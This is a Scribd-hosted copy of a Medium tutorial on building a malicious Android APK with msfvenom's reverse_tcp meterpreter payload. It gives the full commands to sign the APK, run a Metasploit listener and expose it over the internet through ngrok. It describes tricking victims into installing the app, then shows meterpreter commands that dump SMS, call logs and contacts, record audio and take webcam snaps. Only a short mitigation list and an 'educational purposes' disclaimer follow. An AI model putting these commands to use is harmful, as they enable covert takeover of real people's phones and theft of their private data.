Scribd
Upload
48 views16 pages

How To Exploit Any Android Device Using Msfvenom and Metasploit Framework - by Archana Tulsiyani - Medium

How to Exploit Any Android Device Using Msfvenom and Metasploit Framework _ by Archana Tulsiyani _ Medium

Uploaded by

raisulb
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
48 views16 pages

How To Exploit Any Android Device Using Msfvenom and Metasploit Framework - by Archana Tulsiyani - Medium

How to Exploit Any Android Device Using Msfvenom and Metasploit Framework _ by Archana Tulsiyani _ Medium

Uploaded by

raisulb
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 16

9/13/23, 12:31 AM How to exploit any android device using msfvenom and Metasploit Framework | by Archana Tulsiyani | Medium

Open in app Sign up Sign In

How to exploit any android device using


msfvenom and Metasploit Framework
Archana Tulsiyani · Follow
9 min read · Apr 22, 2021

Listen Share

Learn how you can exploit and get any sensitive information from any android
device.

Photo by Denny Müller on Unsplash

In this tutorial, we’ll learn how to use MSFvenom and the Metasploit framework to
exploit an Android mobile device. We’ll build the payload with MSFvenom, save it as

https://archanatulsiyani21.medium.com/how-to-exploit-any-android-device-using-msfvenom-and-metasploit-framework-9e90af4a4d7b 1/22
9/13/23, 12:31 AM How to exploit any android device using msfvenom and Metasploit Framework | by Archana Tulsiyani | Medium

a .apk file, and add a listener to the Metasploit system. An attacker can easily regain
control of the Metasploit session until the user/victim downloads and install the
malicious.apk. To do so, an attacker would need to use social engineering to get
the.apk into the victim’s mobile device. We’ll see it with LAN and WAN. For this
tutorial I am using android emulator.

Components:

Attack Machine: Kali Linux Linux (You can you any other Linux based system but I
prefer Kali Linux)

Victim Machine: Android Emilator

Other tools used: Keytool(in-built), jarsigner(in-built) and Zipalign.

What is Keytool?

Keytool is a management tool of the key and certificate. This enables users to
manage their own private and public key pairs and associated self-authentication
certificates for authentication, using digital signatures (where the user
authenticates himself to other users/services). It also enables users to cache their
communicating partners’ public keys (in the form of certificates).

What is Jarsigner?

The jarsigner tool uses Keystore information to create or verify Java ARchive (JAR)
digital signatures. (A JAR file packages in a single file class files, pictures, sounds,
and/or other digital data). The jarsigner checks the digital signature of a JAR file, by
using its supplier certificate (included in the JAR file’s signature block), and checks
whether or not it contains a “trustworthy” public key of a JAR file, that is, in the
designated Keystore.

Please Note: The java key tool in JDK 1.1 has been fully replaced by the key tool
and jarsigner tool. These new tools provides more features not only that it
generates the certificates but can also verify them.

What is MSFvenom?

MSFvenom is the product of merging “MSFpayload” and “MSFencode.” These


techniques are particularly useful for creating payloads in a variety of formats and

https://archanatulsiyani21.medium.com/how-to-exploit-any-android-device-using-msfvenom-and-metasploit-framework-9e90af4a4d7b 2/22
9/13/23, 12:31 AM How to exploit any android device using msfvenom and Metasploit Framework | by Archana Tulsiyani | Medium

encoding them with different encoder modules. By combining these two tools into
one, you can optimize the command-line options while also speeding up the process
by using a single framework. MSFvenom will be used to build our malicious. apk
payload.

Method 1: Exploiting on LAN

Before starting this tutorial you must keep in mind that the target should be on the
same network as the attacker.

Step 1: Creating a malicious apk

Open the terminal in Kali Linux and type the following command. msfvenom -p
android/meterpreter/reverse_tcp LHOST= localhost Ip LPORT= 4444 R >
filename.apk

Arguments explained

-p — Payload to be used

LHOST — Localhost IP to receive a back connection (Check yours with ifconfig


command)

LPORT — Localhost port on which the connection listen for the victim (we set it to
4444)

R — Raw format (we select .apk)

You can use any port number you want; I used 4444. The filename for this payload is
“android_shell.apk”. This file will be mounted on the Android device of our target.
However, we must first set our listener before downloading this file.

Step 2: Verify the apk is created

You can use the command ls -la to verify the apk file is created

https://archanatulsiyani21.medium.com/how-to-exploit-any-android-device-using-msfvenom-and-metasploit-framework-9e90af4a4d7b 3/22
9/13/23, 12:31 AM How to exploit any android device using msfvenom and Metasploit Framework | by Archana Tulsiyani | Medium

Step 3: Sign the Certificate

After we’ve successfully created the.apk file, we’ll need to sign a certificate because
Android devices won’t let us install apps unless the certificate is properly signed.
Only signed.apk files are installed on Android devices.

In Kali Linux, we must manually sign the.apk file with:

Keytool (preinstalled)

jar signer (preinstalled)

zipalign (need to install)

Let’s use Keytool first. Use the following commands to get the Keystore of the.apk
file: keytool -genkey -V -keystore key.keystore -alias hacked -keyalg RSA -keysize
2048 -validity 10000

https://archanatulsiyani21.medium.com/how-to-exploit-any-android-device-using-msfvenom-and-metasploit-framework-9e90af4a4d7b 4/22
9/13/23, 12:31 AM How to exploit any android device using msfvenom and Metasploit Framework | by Archana Tulsiyani | Medium

Let’s use Jarsigner to sign the apk file. Use the following command: jarsigner -
verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore
android_shell.apk hacked

Verify if the application is signed by using the following command: jarsigner -verify
-verbose -certs android_shell.apk

https://archanatulsiyani21.medium.com/how-to-exploit-any-android-device-using-msfvenom-and-metasploit-framework-9e90af4a4d7b 5/22
9/13/23, 12:31 AM How to exploit any android device using msfvenom and Metasploit Framework | by Archana Tulsiyani | Medium

Zipalign is not preinstalled in KaliLinux, so you have to install it use the command:
apt-get install zipalign

Zipalign is it not preinstalled in KaliLinux

Let’s verify the signed .apk to the new file using zipalign using the command:
zipalign -v 4 android_shell.apk singed_jar.apk

We’ve successfully signed our android shell.apk file, and it can now be used in any
Android environment. Following the Zipalign verification, our updated filename is
https://archanatulsiyani21.medium.com/how-to-exploit-any-android-device-using-msfvenom-and-metasploit-framework-9e90af4a4d7b 6/22
9/13/23, 12:31 AM How to exploit any android device using msfvenom and Metasploit Framework | by Archana Tulsiyani | Medium

singed jar.apk.

Step 4: Setup Listener on Metasploit

Load the Metasploit console, using msfconsole. After it’s loaded (it may take few
minutes), draft the multi-handler exploit using the command

use exploit/multi/handler

Now, setup the reverse payload

set payload android/meterpreter/reverse_tcp

Setup the LHOST, your-local-IP, and LPORT which you will use to generate the
payload. Here 4444 port number is used. If you don’t know your IP address you can
always check with the ifconfig command.

set LHOST <your-ip-address>

set LPORT 4444

type run or exploit command to start the listener.

Step 5: Configure Android Emulator

https://archanatulsiyani21.medium.com/how-to-exploit-any-android-device-using-msfvenom-and-metasploit-framework-9e90af4a4d7b 7/22
9/13/23, 12:31 AM How to exploit any android device using msfvenom and Metasploit Framework | by Archana Tulsiyani | Medium

For this tutorial, I am using an Android emulator. Let’s quickly install the android
emulator.

You can download the Android x86 code from Google code. Follow the steps below
to install the Android Emulator

· In the VMware workstation, build a virtual machine

· In the VMware options, mount the ISO file.

· Complete the procedure and start the computer in LIVE mode.

· Configure the Android computer.

· Create a Google account.

Note: With an Ethernet adapter, the Android x86 project will link to a local network
(VMnet8). You can use a CLI Android emulator if you are using another emulator to
penetrate the Android device.

Step 6: Install Malicious apk in the target device

Once the target installs the app, run the application as soon as it’s installed. When
the victim will open the application you will get access to the android phone.
However, the target will not suspect anything.

https://archanatulsiyani21.medium.com/how-to-exploit-any-android-device-using-msfvenom-and-metasploit-framework-9e90af4a4d7b 8/22
9/13/23, 12:31 AM How to exploit any android device using msfvenom and Metasploit Framework | by Archana Tulsiyani | Medium

As you can see in the screenshot we have successfully acquired the Meterpreter
session on the android device. Let’s start with some common commands

Sysinfo

This will show you information regarding the system you have access to.

Root Check

This command will let you know if the device is rooted or not.

https://archanatulsiyani21.medium.com/how-to-exploit-any-android-device-using-msfvenom-and-metasploit-framework-9e90af4a4d7b 9/22
9/13/23, 12:31 AM How to exploit any android device using msfvenom and Metasploit Framework | by Archana Tulsiyani | Medium

Record Mic

This command will record the socunds on victim end.

Get Wan Geo Location, Dumped SMS, Dumped Call Logs, and Change the audio
mode.

This command will give you the geolocation of wan, will dump the call logs if any,
and same goes for messages. It will also change the audio mode of the android
device. Here I am using android emulator so there are no text messages as well as
call logs.

https://archanatulsiyani21.medium.com/how-to-exploit-any-android-device-using-msfvenom-and-metasploit-framework-9e90af4a4d7b 10/22
9/13/23, 12:31 AM How to exploit any android device using msfvenom and Metasploit Framework | by Archana Tulsiyani | Medium

Dump Contacts

This command will save the list of a contact saved in the device in the text file.

You can see the dumped contacts using cat command as cat <name of the file>.

https://archanatulsiyani21.medium.com/how-to-exploit-any-android-device-using-msfvenom-and-metasploit-framework-9e90af4a4d7b 11/22
9/13/23, 12:31 AM How to exploit any android device using msfvenom and Metasploit Framework | by Archana Tulsiyani | Medium

Webcam snap

This command will take a screenshot of the screen of the device.

Get Uid

This command will give you the uid of the device

https://archanatulsiyani21.medium.com/how-to-exploit-any-android-device-using-msfvenom-and-metasploit-framework-9e90af4a4d7b 12/22
9/13/23, 12:31 AM How to exploit any android device using msfvenom and Metasploit Framework | by Archana Tulsiyani | Medium

Application List

This command will show you the list of application that is installed on the android
device

Apart, from these commands, there are various commands that you can perform.
You can find the list of commands using ?

Method 2: Exploitation over WAN

https://archanatulsiyani21.medium.com/how-to-exploit-any-android-device-using-msfvenom-and-metasploit-framework-9e90af4a4d7b 13/22
9/13/23, 12:31 AM How to exploit any android device using msfvenom and Metasploit Framework | by Archana Tulsiyani | Medium

In a WAN, you usually need a Static IP/Hostname and then Port Forwarding to
enable traffic transmission, and we all know that these are difficult to do in real-
time because we have restricted access to ports in a network.

As a result, in this case, we’ll use Ngrok to build a safe tunnel.

Ngrok is a tunneling reverse proxy technology that creates tunnels from a public
endpoint, such as the internet, to a network service that is running locally. This can
be used to generate a public HTTP/HTTPS URL for a website that is hosted locally
on our machine. When using Ngrok, we don’t need to use any port forwarding, and
our network service will eventually be exposed to the internet through TCP
tunneling.

Follow the steps below

Step1: Create a Ngrok Account

Sign-up for the Ngrok Account and It will lead you to the download page.

As soon as you sign up it will take you to the download page of ngrok

https://archanatulsiyani21.medium.com/how-to-exploit-any-android-device-using-msfvenom-and-metasploit-framework-9e90af4a4d7b 14/22
9/13/23, 12:31 AM How to exploit any android device using msfvenom and Metasploit Framework | by Archana Tulsiyani | Medium

You can choose the OS you are working on from here and download the ngrok.

Step 2: Connect your account

When you run this command, your auth token will be added to the default
ngrok.yml configuration file. This will give you access to more features and allow
you to stay online for longer periods. (After signing in, copy and paste your token
here from the ngrok home screen)

(After signing in, copy and paste your token here from the ngrok home screen)

./ngrok auth token <your-token>

You’re now able to put this tool to work.

./ngrok tcp [port no]

Use the port no with you want to bind the connection.

The TCP tunnel provided by ngrok is defined by the forwarding here. The link is
now connected to port no of your choice on localhost.

After these two steps follow rest of the steps same as Method 1 from step 4.

How to Mitigate attacks like these

https://archanatulsiyani21.medium.com/how-to-exploit-any-android-device-using-msfvenom-and-metasploit-framework-9e90af4a4d7b 15/22
9/13/23, 12:31 AM How to exploit any android device using msfvenom and Metasploit Framework | by Archana Tulsiyani | Medium

Don’t allow applications to be downloaded from cloud sites.

Don’t install apps with unknown source options enabled.

Use antivirus.

Don’t click on any unrelated or unknown links.

Never download any unwanted .doc, .pdf or .apk file.

Always double-check the source before downloading.

Conclusion

This is how an Android device can be exploited and accessed regardless of the type
of connection between both the attacker and the victim. It can be seen that it is very
easy to hack into an android device when the user is unaware.

Such apps may be shared in click-to-click social media groups to attract users
without informing them of the attack.

Please note that you’re not advised to use this tutorial for an illegal purpose. This is
for educational purposes only. I am not responsible for any illegal activity
performed

Msfvenom Metasploit Android Exploit Sensitive Information

Follow

Written by Archana Tulsiyani


6 Followers

https://archanatulsiyani21.medium.com/how-to-exploit-any-android-device-using-msfvenom-and-metasploit-framework-9e90af4a4d7b 16/22

You might also like